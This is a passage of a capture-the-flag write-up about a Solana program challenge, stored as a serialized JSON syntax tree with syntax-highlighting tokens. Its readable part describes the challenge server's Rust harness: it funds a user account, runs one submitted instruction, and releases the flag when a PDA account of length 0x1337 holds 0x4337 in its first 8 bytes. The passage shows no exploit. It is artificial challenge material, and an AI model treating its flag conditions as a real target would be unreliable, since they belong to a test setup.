9},[41168],{"type":33,"value":1044},{"type":28,"tag":116,"props":41170,"children":41171},{"class":245,"line":631},[41172,41176,41180,41184,41188,41192,41196,41200],{"type":28,"tag":116,"props":41173,"children":41174},{"style":272},[41175],{"type":33,"value":40674},{"type":28,"tag":116,"props":41177,"children":41178},{"style":370},[41179],{"type":33,"value":2226},{"type":28,"tag":116,"props":41181,"children":41182},{"style":370},[41183],{"type":33,"value":6813},{"type":28,"tag":116,"props":41185,"children":41186},{"style":272},[41187],{"type":33,"value":3372},{"type":28,"tag":116,"props":41189,"children":41190},{"style":266},[41191],{"type":33,"value":347},{"type":28,"tag":116,"props":41193,"children":41194},{"style":350},[41195],{"type":33,"value":40467},{"type":28,"tag":116,"props":41197,"children":41198},{"style":370},[41199],{"type":33,"value":2723},{"type":28,"tag":116,"props":41201,"children":41202},{"style":266},[41203],{"type":33,"value":31223},{"type":28,"tag":116,"props":41205,"children":41206},{"class":245,"line":665},[41207],{"type":28,"tag":116,"props":41208,"children":41209},{"emptyLinePlaceholder":19},[41210],{"type":33,"value":1044},{"type":28,"tag":116,"props":41212,"children":41213},{"class":245,"line":713},[41214,41218,41222,41226,41230,41234,41238,41242,41246,41250,41254,41258,41262,41266,41270,41274,41278,41282,41286,41290,41294,41298,41302,41306,41310,41314,41318,41322,41326],{"type":28,"tag":116,"props":41215,"children":41216},{"style":376},[41217],{"type":33,"value":2736},{"type":28,"tag":116,"props":41219,"children":41220},{"style":272},[41221],{"type":33,"value":13523},{"type":28,"tag":116,"props":41223,"children":41224},{"style":370},[41225],{"type":33,"value":2226},{"type":28,"tag":116,"props":41227,"children":41228},{"style":266},[41229],{"type":33,"value":40275},{"type":28,"tag":116,"props":41231,"children":41232},{"style":370},[41233],{"type":33,"value":3151},{"type":28,"tag":116,"props":41235,"children":41236},{"style":266},[41237],{"type":33,"value":40284},{"type":28,"tag":116,"props":41239,"children":41240},{"style":370},[41241],{"type":33,"value":3151},{"type":28,"tag":116,"props":41243,"children":41244},{"style":282},[41245],{"type":33,"value":40293},{"type":28,"tag":116,"props":41247,"children":41248},{"style":370},[41249],{"type":33,"value":3151},{"type":28,"tag":116,"props":41251,"children":41252},{"style":266},[41253],{"type":33,"value":40302},{"type":28,"tag":116,"props":41255,"children":41256},{"style":339},[41257],{"type":33,"value":3091},{"type":28,"tag":116,"props":41259,"children":41260},{"style":266},[41261],{"type":33,"value":16888},{"type":28,"tag":116,"props":41263,"children":41264},{"style":350},[41265],{"type":33,"value":3745},{"type":28,"tag":116,"props":41267,"children":41268},{"style":266},[41269],{"type":33,"value":22723},{"type":28,"tag":116,"props":41271,"children":41272},{"style":376},[41273],{"type":33,"value":19930},{"type":28,"tag":116,"props":41275,"children":41276},{"style":266},[41277],{"type":33,"value":313},{"type":28,"tag":116,"props":41279,"children":41280},{"style":339},[41281],{"type":33,"value":7714},{"type":28,"tag":116,"props":41283,"children":41284},{"style":266},[41285],{"type":33,"value":40983},{"type":28,"tag":116,"props":41287,"children":41288},{"style":272},[41289],{"type":33,"value":3372},{"type":28,"tag":116,"props":41291,"children":41292},{"style":266},[41293],{"type":33,"value":347},{"type":28,"tag":116,"props":41295,"children":41296},{"style":370},[41297],{"type":33,"value":2723},{"type":28,"tag":116,"props":41299,"children":41300},{"style":350},[41301],{"type":33,"value":3745},{"type":28,"tag":116,"props":41303,"children":41304},{"style":266},[41305],{"type":33,"value":15074},{"type":28,"tag":116,"props":41307,"children":41308},{"style":370},[41309],{"type":33,"value":141},{"type":28,"tag":116,"props":41311,"children":41312},{"style":282},[41313],{"type":33,"value":25817},{"type":28,"tag":116,"props":41315,"children":41316},{"style":266},[41317],{"type":33,"value":13545},{"type":28,"tag":116,"props":41319,"children":41320},{"style":370},[41321],{"type":33,"value":141},{"type":28,"tag":116,"props":41323,"children":41324},{"style":282},[41325],{"type":33,"value":3336},{"type":28,"tag":116,"props":41327,"children":41328},{"style":266},[41329],{"type":33,"value":1577},{"type":28,"tag":116,"props":41331,"children":41332},{"class":245,"line":750},[41333,41337,41341,41345,41349,41353,41357,41361,41365,41369,41373,41377,41381,41385,41389,41393,41397,41401,41405,41409,41413,41417,41421,41425,41429,41433,41437,41441],{"type":28,"tag":116,"props":41334,"children":41335},{"style":376},[41336],{"type":33,"value":2736},{"type":28,"tag":116,"props":41338,"children":41339},{"style":272},[41340],{"type":33,"value":40390},{"type":28,"tag":116,"props":41342,"children":41343},{"style":370},[41344],{"type":33,"value":2226},{"type":28,"tag":116,"props":41346,"children":41347},{"style":266},[41348],{"type":33,"value":40275},{"type":28,"tag":116,"props":41350,"children":41351},{"style":370},[41352],{"type":33,"value":3151},{"type":28,"tag":116,"props":41354,"children":41355},{"style":266},[41356],{"type":33,"value":40284},{"type":28,"tag":116,"props":41358,"children":41359},{"style":370},[41360],{"type":33,"value":3151},{"type":28,"tag":116,"props":41362,"children":41363},{"style":282},[41364],{"type":33,"value":40293},{"type":28,"tag":116,"props":41366,"children":41367},{"style":370},[41368],{"type":33,"value":3151},{"type":28,"tag":116,"props":41370,"children":41371},{"style":266},[41372],{"type":33,"value":40302},{"type":28,"tag":116,"props":41374,"children":41375},{"style":339},[41376],{"type":33,"value":3091},{"type":28,"tag":116,"props":41378,"children":41379},{"style":266},[41380],{"type":33,"value":16888},{"type":28,"tag":116,"props":41382,"children":41383},{"style":350},[41384],{"type":33,"value":3745},{"type":28,"tag":116,"props":41386,"children":41387},{"style":266},[41388],{"type":33,"value":22723},{"type":28,"tag":116,"props":41390,"children":41391},{"style":339},[41392],{"type":33,"value":7714},{"type":28,"tag":116,"props":41394,"children":41395},{"style":266},[41396],{"type":33,"value":7282},{"type":28,"tag":116,"props":41398,"children":41399},{"style":272},[41400],{"type":33,"value":3372},{"type":28,"tag":116,"props":41402,"children":41403},{"style":266},[41404],{"type":33,"value":347},{"type":28,"tag":116,"props":41406,"children":41407},{"style":350},[41408],{"type":33,"value":3745},{"type":28,"tag":116,"props":41410,"children":41411},{"style":370},[41412],{"type":33,"value":2723},{"type":28,"tag":116,"props":41414,"children":41415},{"style":350},[41416],{"type":33,"value":40467},{"type":28,"tag":116,"props":41418,"children":41419},{"style":266},[41420],{"type":33,"value":15074},{"type":28,"tag":116,"props":41422,"children":41423},{"style":370},[41424],{"type":33,"value":141},{"type":28,"tag":116,"props":41426,"children":41427},{"style":282},[41428],{"type":33,"value":25817},{"type":28,"tag":116,"props":41430,"children":41431},{"style":266},[41432],{"type":33,"value":13545},{"type":28,"tag":116,"props":41434,"children":41435},{"style":370},[41436],{"type":33,"value":141},{"type":28,"tag":116,"props":41438,"children":41439},{"style":282},[41440],{"type":33,"value":3336},{"type":28,"tag":116,"props":41442,"children":41443},{"style":266},[41444],{"type":33,"value":1577},{"type":28,"tag":116,"props":41446,"children":41447},{"class":245,"line":779},[41448,41452,41456,41460],{"type":28,"tag":116,"props":41449,"children":41450},{"style":282},[41451],{"type":33,"value":40503},{"type":28,"tag":116,"props":41453,"children":41454},{"style":266},[41455],{"type":33,"value":313},{"type":28,"tag":116,"props":41457,"children":41458},{"style":272},[41459],{"type":33,"value":12299},{"type":28,"tag":116,"props":41461,"children":41462},{"style":266},[41463],{"type":33,"value":895},{"type":28,"tag":116,"props":41465,"children":41466},{"class":245,"line":796},[41467],{"type":28,"tag":116,"props":41468,"children":41469},{"style":266},[41470],{"type":33,"value":3025},{"type":28,"tag":116,"props":41472,"children":41473},{"class":245,"line":847},[41474],{"type":28,"tag":116,"props":41475,"children":41476},{"style":266},[41477],{"type":33,"value":406},{"type":28,"tag":75,"props":41479,"children":41481},{"id":41480},"test-environment",[41482],{"type":33,"value":41483},"Test Environment",{"type":28,"tag":29,"props":41485,"children":41486},{},[41487],{"type":33,"value":41488},"To understand our capabilites regarding interaction with the program and determine what is necessary to get the flag, we must analyze the test environment.",{"type":28,"tag":29,"props":41490,"children":41491},{},[41492,41494,41500],{"type":33,"value":41493},"When you connect to the server through a tcp connection, ",{"type":28,"tag":98,"props":41495,"children":41497},{"className":41496},[],[41498],{"type":33,"value":41499},"framework/src/main.rs::handle_connection",{"type":33,"value":41501}," gets executed, which does the following:",{"type":28,"tag":455,"props":41503,"children":41504},{},[41505],{"type":28,"tag":459,"props":41506,"children":41507},{},[41508],{"type":33,"value":41509},"Creates a new Solana local node",{"type":28,"tag":234,"props":41511,"children":41513},{"className":2652,"code":41512,"language":2651,"meta":7,"style":7},"let mut builder = ChallengeBuilder::try_from(socket.try_clone().unwrap()).unwrap();\nassert!(builder.add_program(\"/path/to/chall.so\", Some(chall::ID)) == chall::ID);\nlet mut chall = builder.build().await;\n",[41514],{"type":28,"tag":98,"props":41515,"children":41516},{"__ignoreMap":7},[41517,41598,41674],{"type":28,"tag":116,"props":41518,"children":41519},{"class":245,"line":246},[41520,41524,41528,41533,41537,41542,41546,41551,41555,41560,41564,41569,41573,41577,41581,41586,41590,41594],{"type":28,"tag":116,"props":41521,"children":41522},{"style":376},[41523],{"type":33,"value":11455},{"type":28,"tag":116,"props":41525,"children":41526},{"style":376},[41527],{"type":33,"value":2677},{"type":28,"tag":116,"props":41529,"children":41530},{"style":272},[41531],{"type":33,"value":41532}," builder",{"type":28,"tag":116,"props":41534,"children":41535},{"style":370},[41536],{"type":33,"value":2226},{"type":28,"tag":116,"props":41538,"children":41539},{"style":339},[41540],{"type":33,"value":41541}," ChallengeBuilder",{"type":28,"tag":116,"props":41543,"children":41544},{"style":370},[41545],{"type":33,"value":3151},{"type":28,"tag":116,"props":41547,"children":41548},{"style":282},[41549],{"type":33,"value":41550},"try_from",{"type":28,"tag":116,"props":41552,"children":41553},{"style":266},[41554],{"type":33,"value":313},{"type":28,"tag":116,"props":41556,"children":41557},{"style":272},[41558],{"type":33,"value":41559},"socket",{"type":28,"tag":116,"props":41561,"children":41562},{"style":370},[41563],{"type":33,"value":141},{"type":28,"tag":116,"props":41565,"children":41566},{"style":282},[41567],{"type":33,"value":41568},"try_clone",{"type":28,"tag":116,"props":41570,"children":41571},{"style":266},[41572],{"type":33,"value":13545},{"type":28,"tag":116,"props":41574,"children":41575},{"style":370},[41576],{"type":33,"value":141},{"type":28,"tag":116,"props":41578,"children":41579},{"style":282},[41580],{"type":33,"value":3336},{"type":28,"tag":116,"props":41582,"children":41583},{"style":266},[41584],{"type":33,"value":41585},"())",{"type":28,"tag":116,"props":41587,"children":41588},{"style":370},[41589],{"type":33,"value":141},{"type":28,"tag":116,"props":41591,"children":41592},{"style":282},[41593],{"type":33,"value":3336},{"type":28,"tag":116,"props":41595,"children":41596},{"style":266},[41597],{"type":33,"value":1445},{"type":28,"tag":116,"props":41599,"children":41600},{"class":245,"line":256},[41601,41606,41610,41615,41619,41624,41628,41633,41637,41642,41647,41651,41656,41660,41665,41669],{"type":28,"tag":116,"props":41602,"children":41603},{"style":282},[41604],{"type":33,"value":41605},"assert!",{"type":28,"tag":116,"props":41607,"children":41608},{"style":266},[41609],{"type":33,"value":313},{"type":28,"tag":116,"props":41611,"children":41612},{"style":272},[41613],{"type":33,"value":41614},"builder",{"type":28,"tag":116,"props":41616,"children":41617},{"style":370},[41618],{"type":33,"value":141},{"type":28,"tag":116,"props":41620,"children":41621},{"style":282},[41622],{"type":33,"value":41623},"add_program",{"type":28,"tag":116,"props":41625,"children":41626},{"style":266},[41627],{"type":33,"value":313},{"type":28,"tag":116,"props":41629,"children":41630},{"style":563},[41631],{"type":33,"value":41632},"\"/path/to/chall.so\"",{"type":28,"tag":116,"props":41634,"children":41635},{"style":266},[41636],{"type":33,"value":825},{"type":28,"tag":116,"props":41638,"children":41639},{"style":339},[41640],{"type":33,"value":41641},"Some",{"type":28,"tag":116,"props":41643,"children":41644},{"style":266},[41645],{"type":33,"value":41646},"(chall",{"type":28,"tag":116,"props":41648,"children":41649},{"style":370},[41650],{"type":33,"value":3151},{"type":28,"tag":116,"props":41652,"children":41653},{"style":266},[41654],{"type":33,"value":41655},"ID)) ",{"type":28,"tag":116,"props":41657,"children":41658},{"style":370},[41659],{"type":33,"value":2340},{"type":28,"tag":116,"props":41661,"children":41662},{"style":266},[41663],{"type":33,"value":41664}," chall",{"type":28,"tag":116,"props":41666,"children":41667},{"style":370},[41668],{"type":33,"value":3151},{"type":28,"tag":116,"props":41670,"children":41671},{"style":266},[41672],{"type":33,"value":41673},"ID);\n",{"type":28,"tag":116,"props":41675,"children":41676},{"class":245,"line":293},[41677,41681,41685,41689,41693,41697,41701,41706,41710,41714,41718],{"type":28,"tag":116,"props":41678,"children":41679},{"style":376},[41680],{"type":33,"value":11455},{"type":28,"tag":116,"props":41682,"children":41683},{"style":376},[41684],{"type":33,"value":2677},{"type":28,"tag":116,"props":41686,"children":41687},{"style":272},[41688],{"type":33,"value":41664},{"type":28,"tag":116,"props":41690,"children":41691},{"style":370},[41692],{"type":33,"value":2226},{"type":28,"tag":116,"props":41694,"children":41695},{"style":272},[41696],{"type":33,"value":41532},{"type":28,"tag":116,"props":41698,"children":41699},{"style":370},[41700],{"type":33,"value":141},{"type":28,"tag":116,"props":41702,"children":41703},{"style":282},[41704],{"type":33,"value":41705},"build",{"type":28,"tag":116,"props":41707,"children":41708},{"style":266},[41709],{"type":33,"value":13545},{"type":28,"tag":116,"props":41711,"children":41712},{"style":370},[41713],{"type":33,"value":141},{"type":28,"tag":116,"props":41715,"children":41716},{"style":260},[41717],{"type":33,"value":1091},{"type":28,"tag":116,"props":41719,"children":41720},{"style":266},[41721],{"type":33,"value":384},{"type":28,"tag":455,"props":41723,"children":41724},{"start":256},[41725],{"type":28,"tag":459,"props":41726,"children":41727},{},[41728],{"type":33,"value":41729},"Funds the user account with 100 SOL",{"type":28,"tag":234,"props":41731,"children":41733},{"className":2652,"code":41732,"language":2651,"meta":7,"style":7},"let user_keypair = Keypair::new();\nlet user = user_keypair.pubkey();\n\nlet payer_keypair = &chall.ctx.payer;\nlet payer = payer_keypair.pubkey();\n\nchall\n    .run_ix(system_instruction::transfer(&payer, &user, 100_000_000_000))\n    .await?;\n\nwriteln!(socket, \"user: {}\", user)?;\n",[41734],{"type":28,"tag":98,"props":41735,"children":41736},{"__ignoreMap":7},[41737,41770,41802,41809,41851,41883,41890,41898,41962,41981,41988],{"type":28,"tag":116,"props":41738,"children":41739},{"class":245,"line":246},[41740,41744,41749,41753,41758,41762,41766],{"type":28,"tag":116,"props":41741,"children":41742},{"style":376},[41743],{"type":33,"value":11455},{"type":28,"tag":116,"props":41745,"children":41746},{"style":272},[41747],{"type":33,"value":41748}," user_keypair",{"type":28,"tag":116,"props":41750,"children":41751},{"style":370},[41752],{"type":33,"value":2226},{"type":28,"tag":116,"props":41754,"children":41755},{"style":339},[41756],{"type":33,"value":41757}," Keypair",{"type":28,"tag":116,"props":41759,"children":41760},{"style":370},[41761],{"type":33,"value":3151},{"type":28,"tag":116,"props":41763,"children":41764},{"style":282},[41765],{"type":33,"value":336},{"type":28,"tag":116,"props":41767,"children":41768},{"style":266},[41769],{"type":33,"value":1445},{"type":28,"tag":116,"props":41771,"children":41772},{"class":245,"line":256},[41773,41777,41782,41786,41790,41794,41798],{"type":28,"tag":116,"props":41774,"children":41775},{"style":376},[41776],{"type":33,"value":11455},{"type":28,"tag":116,"props":41778,"children":41779},{"style":272},[41780],{"type":33,"value":41781}," user",{"type":28,"tag":116,"props":41783,"children":41784},{"style":370},[41785],{"type":33,"value":2226},{"type":28,"tag":116,"props":41787,"children":41788},{"style":272},[41789],{"type":33,"value":41748},{"type":28,"tag":116,"props":41791,"children":41792},{"style":370},[41793],{"type":33,"value":141},{"type":28,"tag":116,"props":41795,"children":41796},{"style":282},[41797],{"type":33,"value":3215},{"type":28,"tag":116,"props":41799,"children":41800},{"style":266},[41801],{"type":33,"value":1445},{"type":28,"tag":116,"props":41803,"children":41804},{"class":245,"line":293},[41805],{"type":28,"tag":116,"props":41806,"children":41807},{"emptyLinePlaceholder":19},[41808],{"type":33,"value":1044},{"type":28,"tag":116,"props":41810,"children":41811},{"class":245,"line":361},[41812,41816,41821,41825,41829,41834,41838,41842,41846],{"type":28,"tag":116,"props":41813,"children":41814},{"style":376},[41815],{"type":33,"value":11455},{"type":28,"tag":116,"props":41817,"children":41818},{"style":272},[41819],{"type":33,"value":41820}," payer_keypair",{"type":28,"tag":116,"props":41822,"children":41823},{"style":370},[41824],{"type":33,"value":2226},{"type":28,"tag":116,"props":41826,"children":41827},{"style":370},[41828],{"type":33,"value":6813},{"type":28,"tag":116,"props":41830,"children":41831},{"style":272},[41832],{"type":33,"value":41833},"chall",{"type":28,"tag":116,"props":41835,"children":41836},{"style":370},[41837],{"type":33,"value":141},{"type":28,"tag":116,"props":41839,"children":41840},{"style":266},[41841],{"type":33,"value":19944},{"type":28,"tag":116,"props":41843,"children":41844},{"style":370},[41845],{"type":33,"value":141},{"type":28,"tag":116,"props":41847,"children":41848},{"style":266},[41849],{"type":33,"value":41850},"payer;\n",{"type":28,"tag":116,"props":41852,"children":41853},{"class":245,"line":387},[41854,41858,41863,41867,41871,41875,41879],{"type":28,"tag":116,"props":41855,"children":41856},{"style":376},[41857],{"type":33,"value":11455},{"type":28,"tag":116,"props":41859,"children":41860},{"style":272},[41861],{"type":33,"value":41862}," payer",{"type":28,"tag":116,"props":41864,"children":41865},{"style":370},[41866],{"type":33,"value":2226},{"type":28,"tag":116,"props":41868,"children":41869},{"style":272},[41870],{"type":33,"value":41820},{"type":28,"tag":116,"props":41872,"children":41873},{"style":370},[41874],{"type":33,"value":141},{"type":28,"tag":116,"props":41876,"children":41877},{"style":282},[41878],{"type":33,"value":3215},{"type":28,"tag":116,"props":41880,"children":41881},{"style":266},[41882],{"type":33,"value":1445},{"type":28,"tag":116,"props":41884,"children":41885},{"class":245,"line":400},[41886],{"type":28,"tag":116,"props":41887,"children":41888},{"emptyLinePlaceholder":19},[41889],{"type":33,"value":1044},{"type":28,"tag":116,"props":41891,"children":41892},{"class":245,"line":614},[41893],{"type":28,"tag":116,"props":41894,"children":41895},{"style":272},[41896],{"type":33,"value":41897},"chall\n",{"type":28,"tag":116,"props":41899,"children":41900},{"class":245,"line":631},[41901,41906,41911,41916,41920,41924,41928,41932,41937,41941,41945,41949,41953,41958],{"type":28,"tag":116,"props":41902,"children":41903},{"style":370},[41904],{"type":33,"value":41905},"    .",{"type":28,"tag":116,"props":41907,"children":41908},{"style":282},[41909],{"type":33,"value":41910},"run_ix",{"type":28,"tag":116,"props":41912,"children":41913},{"style":266},[41914],{"type":33,"value":41915},"(system_instruction",{"type":28,"tag":116,"props":41917,"children":41918},{"style":370},[41919],{"type":33,"value":3151},{"type":28,"tag":116,"props":41921,"children":41922},{"style":282},[41923],{"type":33,"value":31772},{"type":28,"tag":116,"props":41925,"children":41926},{"style":266},[41927],{"type":33,"value":313},{"type":28,"tag":116,"props":41929,"children":41930},{"style":370},[41931],{"type":33,"value":2780},{"type":28,"tag":116,"props":41933,"children":41934},{"style":272},[41935],{"type":33,"value":41936},"payer",{"type":28,"tag":116,"props":41938,"children":41939},{"style":266},[41940],{"type":33,"value":825},{"type":28,"tag":116,"props":41942,"children":41943},{"style":370},[41944],{"type":33,"value":2780},{"type":28,"tag":116,"props":41946,"children":41947},{"style":272},[41948],{"type":33,"value":19896},{"type":28,"tag":116,"props":41950,"children":41951},{"style":266},[41952],{"type":33,"value":825},{"type":28,"tag":116,"props":41954,"children":41955},{"style":350},[41956],{"type":33,"value":41957},"100_000_000_000",{"type":28,"tag":116,"props":41959,"children":41960},{"style":266},[41961],{"type":33,"value":19376},{"type":28,"tag":116,"props":41963,"children":41964},{"class":245,"line":665},[41965,41969,41973,41977],{"type":28,"tag":116,"props":41966,"children":41967},{"style":370},[41968],{"type":33,"value":41905},{"type":28,"tag":116,"props":41970,"children":41971},{"style":260},[41972],{"type":33,"value":1091},{"type":28,"tag":116,"props":41974,"children":41975},{"style":370},[41976],{"type":33,"value":2825},{"type":28,"tag":116,"props":41978,"children":41979},{"style":266},[41980],{"type":33,"value":384},{"type":28,"tag":116,"props":41982,"children":41983},{"class":245,"line":713},[41984],{"type":28,"tag":116,"props":41985,"children":41986},{"emptyLinePlaceholder":19},[41987],{"type":33,"value":1044},{"type":28,"tag":116,"props":41989,"children":41990},{"class":245,"line":750},[41991,41996,42000,42004,42008,42013,42017,42021,42025,42029],{"type":28,"tag":116,"props":41992,"children":41993},{"style":282},[41994],{"type":33,"value":41995},"writeln!",{"type":28,"tag":116,"props":41997,"children":41998},{"style":266},[41999],{"type":33,"value":313},{"type":28,"tag":116,"props":42001,"children":42002},{"style":272},[42003],{"type":33,"value":41559},{"type":28,"tag":116,"props":42005,"children":42006},{"style":266},[42007],{"type":33,"value":825},{"type":28,"tag":116,"props":42009,"children":42010},{"style":563},[42011],{"type":33,"value":42012},"\"user: {}\"",{"type":28,"tag":116,"props":42014,"children":42015},{"style":266},[42016],{"type":33,"value":825},{"type":28,"tag":116,"props":42018,"children":42019},{"style":272},[42020],{"type":33,"value":19896},{"type":28,"tag":116,"props":42022,"children":42023},{"style":266},[42024],{"type":33,"value":1829},{"type":28,"tag":116,"props":42026,"children":42027},{"style":370},[42028],{"type":33,"value":2825},{"type":28,"tag":116,"props":42030,"children":42031},{"style":266},[42032],{"type":33,"value":384},{"type":28,"tag":455,"props":42034,"children":42035},{"start":293},[42036],{"type":28,"tag":459,"props":42037,"children":42038},{},[42039],{"type":33,"value":42040},"Reads an instruction from the tcp stream and executes it",{"type":28,"tag":234,"props":42042,"children":42044},{"className":2652,"code":42043,"language":2651,"meta":7,"style":7},"let solve_ix = chall.read_instruction(chall::ID)?;\nchall.run_ixs_full(&[solve_ix], &[&user_keypair], &user).await?;\n",[42045],{"type":28,"tag":98,"props":42046,"children":42047},{"__ignoreMap":7},[42048,42098],{"type":28,"tag":116,"props":42049,"children":42050},{"class":245,"line":246},[42051,42055,42060,42064,42068,42072,42077,42081,42085,42090,42094],{"type":28,"tag":116,"props":42052,"children":42053},{"style":376},[42054],{"type":33,"value":11455},{"type":28,"tag":116,"props":42056,"children":42057},{"style":272},[42058],{"type":33,"value":42059}," solve_ix",{"type":28,"tag":116,"props":42061,"children":42062},{"style":370},[42063],{"type":33,"value":2226},{"type":28,"tag":116,"props":42065,"children":42066},{"style":272},[42067],{"type":33,"value":41664},{"type":28,"tag":116,"props":42069,"children":42070},{"style":370},[42071],{"type":33,"value":141},{"type":28,"tag":116,"props":42073,"children":42074},{"style":282},[42075],{"type":33,"value":42076},"read_instruction",{"type":28,"tag":116,"props":42078,"children":42079},{"style":266},[42080],{"type":33,"value":41646},{"type":28,"tag":116,"props":42082,"children":42083},{"style":370},[42084],{"type":33,"value":3151},{"type":28,"tag":116,"props":42086,"children":42087},{"style":266},[42088],{"type":33,"value":42089},"ID)",{"type":28,"tag":116,"props":42091,"children":42092},{"style":370},[42093],{"type":33,"value":2825},{"type":28,"tag":116,"props":42095,"children":42096},{"style":266},[42097],{"type":33,"value":384},{"type":28,"tag":116,"props":42099,"children":42100},{"class":245,"line":256},[42101,42105,42109,42114,42118,42122,42126,42131,42135,42139,42143,42147,42152,42156,42160,42164,42168,42172,42176,42180],{"type":28,"tag":116,"props":42102,"children":42103},{"style":272},[42104],{"type":33,"value":41833},{"type":28,"tag":116,"props":42106,"children":42107},{"style":370},[42108],{"type":33,"value":141},{"type":28,"tag":116,"props":42110,"children":42111},{"style":282},[42112],{"type":33,"value":42113},"run_ixs_full",{"type":28,"tag":116,"props":42115,"children":42116},{"style":266},[42117],{"type":33,"value":313},{"type":28,"tag":116,"props":42119,"children":42120},{"style":370},[42121],{"type":33,"value":2780},{"type":28,"tag":116,"props":42123,"children":42124},{"style":266},[42125],{"type":33,"value":347},{"type":28,"tag":116,"props":42127,"children":42128},{"style":272},[42129],{"type":33,"value":42130},"solve_ix",{"type":28,"tag":116,"props":42132,"children":42133},{"style":266},[42134],{"type":33,"value":22723},{"type":28,"tag":116,"props":42136,"children":42137},{"style":370},[42138],{"type":33,"value":2780},{"type":28,"tag":116,"props":42140,"children":42141},{"style":266},[42142],{"type":33,"value":347},{"type":28,"tag":116,"props":42144,"children":42145},{"style":370},[42146],{"type":33,"value":2780},{"type":28,"tag":116,"props":42148,"children":42149},{"style":272},[42150],{"type":33,"value":42151},"user_keypair",{"type":28,"tag":116,"props":42153,"children":42154},{"style":266},[42155],{"type":33,"value":22723},{"type":28,"tag":116,"props":42157,"children":42158},{"style":370},[42159],{"type":33,"value":2780},{"type":28,"tag":116,"props":42161,"children":42162},{"style":272},[42163],{"type":33,"value":19896},{"type":28,"tag":116,"props":42165,"children":42166},{"style":266},[42167],{"type":33,"value":1829},{"type":28,"tag":116,"props":42169,"children":42170},{"style":370},[42171],{"type":33,"value":141},{"type":28,"tag":116,"props":42173,"children":42174},{"style":260},[42175],{"type":33,"value":1091},{"type":28,"tag":116,"props":42177,"children":42178},{"style":370},[42179],{"type":33,"value":2825},{"type":28,"tag":116,"props":42181,"children":42182},{"style":266},[42183],{"type":33,"value":384},{"type":28,"tag":455,"props":42185,"children":42186},{"start":361},[42187],{"type":28,"tag":459,"props":42188,"children":42189},{},[42190],{"type":33,"value":42191},"Checks that the account at PDA(\"FLAG\") exists, has a data length of 0x1337 and the first 8 bytes are equal to 0x4337. If so, it prints the flag.",{"type":28,"tag":234,"props":42193,"children":42195},{"className":2652,"code":42194,"language":2651,"meta":7,"style":7},"let flag = Pubkey::create_program_address(&[\"FLAG\".as_ref()], &chall::ID)?;\nif let Some(acct) = chall.ctx.banks_client.get_account(flag).await? {\n    if acct.data.len() == 0x1337\n        && u64::from_le_bytes(acct.data[..8].try_into().unwrap()) == 0x4337\n    {\n        writeln!(socket, \"congrats!\")?;\n        if let Ok(flag) = env::var(\"FLAG\") {\n            writeln!(socket, \"flag: {:?}\", flag)?;\n        } else {\n            writeln!(socket, \"flag not found, please contact admin\")?;\n        }\n    }\n}\n",[42196],{"type":28,"tag":98,"props":42197,"children":42198},{"__ignoreMap":7},[42199,42283,42374,42415,42499,42506,42543,42600,42645,42660,42696,42703,42710],{"type":28,"tag":116,"props":42200,"children":42201},{"class":245,"line":246},[42202,42206,42211,42215,42219,42223,42228,42232,42236,42240,42245,42249,42254,42259,42263,42267,42271,42275,42279],{"type":28,"tag":116,"props":42203,"children":42204},{"style":376},[42205],{"type":33,"value":11455},{"type":28,"tag":116,"props":42207,"children":42208},{"style":272},[42209],{"type":33,"value":42210}," flag",{"type":28,"tag":116,"props":42212,"children":42213},{"style":370},[42214],{"type":33,"value":2226},{"type":28,"tag":116,"props":42216,"children":42217},{"style":339},[42218],{"type":33,"value":20520},{"type":28,"tag":116,"props":42220,"children":42221},{"style":370},[42222],{"type":33,"value":3151},{"type":28,"tag":116,"props":42224,"children":42225},{"style":282},[42226],{"type":33,"value":42227},"create_program_address",{"type":28,"tag":116,"props":42229,"children":42230},{"style":266},[42231],{"type":33,"value":313},{"type":28,"tag":116,"props":42233,"children":42234},{"style":370},[42235],{"type":33,"value":2780},{"type":28,"tag":116,"props":42237,"children":42238},{"style":266},[42239],{"type":33,"value":347},{"type":28,"tag":116,"props":42241,"children":42242},{"style":563},[42243],{"type":33,"value":42244},"\"FLAG\"",{"type":28,"tag":116,"props":42246,"children":42247},{"style":370},[42248],{"type":33,"value":141},{"type":28,"tag":116,"props":42250,"children":42251},{"style":282},[42252],{"type":33,"value":42253},"as_ref",{"type":28,"tag":116,"props":42255,"children":42256},{"style":266},[42257],{"type":33,"value":42258},"()], ",{"type":28,"tag":116,"props":42260,"children":42261},{"style":370},[42262],{"type":33,"value":2780},{"type":28,"tag":116,"props":42264,"children":42265},{"style":266},[42266],{"type":33,"value":41833},{"type":28,"tag":116,"props":42268,"children":42269},{"style":370},[42270],{"type":33,"value":3151},{"type":28,"tag":116,"props":42272,"children":42273},{"style":266},[42274],{"type":33,"value":42089},{"type":28,"tag":116,"props":42276,"children":42277},{"style":370},[42278],{"type":33,"value":2825},{"type":28,"tag":116,"props":42280,"children":42281},{"style":266},[42282],{"type":33,"value":384},{"type":28,"tag":116,"props":42284,"children":42285},{"class":245,"line":256},[42286,42290,42294,42298,42302,42307,42311,42315,42319,42323,42327,42331,42336,42340,42345,42349,42354,42358,42362,42366,42370],{"type":28,"tag":116,"props":42287,"children":42288},{"style":260},[42289],{"type":33,"value":263},{"type":28,"tag":116,"props":42291,"children":42292},{"style":376},[42293],{"type":33,"value":26960},{"type":28,"tag":116,"props":42295,"children":42296},{"style":339},[42297],{"type":33,"value":26965},{"type":28,"tag":116,"props":42299,"children":42300},{"style":266},[42301],{"type":33,"value":313},{"type":28,"tag":116,"props":42303,"children":42304},{"style":272},[42305],{"type":33,"value":42306},"acct",{"type":28,"tag":116,"props":42308,"children":42309},{"style":266},[42310],{"type":33,"value":1609},{"type":28,"tag":116,"props":42312,"children":42313},{"style":370},[42314],{"type":33,"value":373},{"type":28,"tag":116,"props":42316,"children":42317},{"style":272},[42318],{"type":33,"value":41664},{"type":28,"tag":116,"props":42320,"children":42321},{"style":370},[42322],{"type":33,"value":141},{"type":28,"tag":116,"props":42324,"children":42325},{"style":266},[42326],{"type":33,"value":19944},{"type":28,"tag":116,"props":42328,"children":42329},{"style":370},[42330],{"type":33,"value":141},{"type":28,"tag":116,"props":42332,"children":42333},{"style":266},[42334],{"type":33,"value":42335},"banks_client",{"type":28,"tag":116,"props":42337,"children":42338},{"style":370},[42339],{"type":33,"value":141},{"type":28,"tag":116,"props":42341,"children":42342},{"style":282},[42343],{"type":33,"value":42344},"get_account",{"type":28,"tag":116,"props":42346,"children":42347},{"style":266},[42348],{"type":33,"value":313},{"type":28,"tag":116,"props":42350,"children":42351},{"style":272},[42352],{"type":33,"value":42353},"flag",{"type":28,"tag":116,"props":42355,"children":42356},{"style":266},[42357],{"type":33,"value":1829},{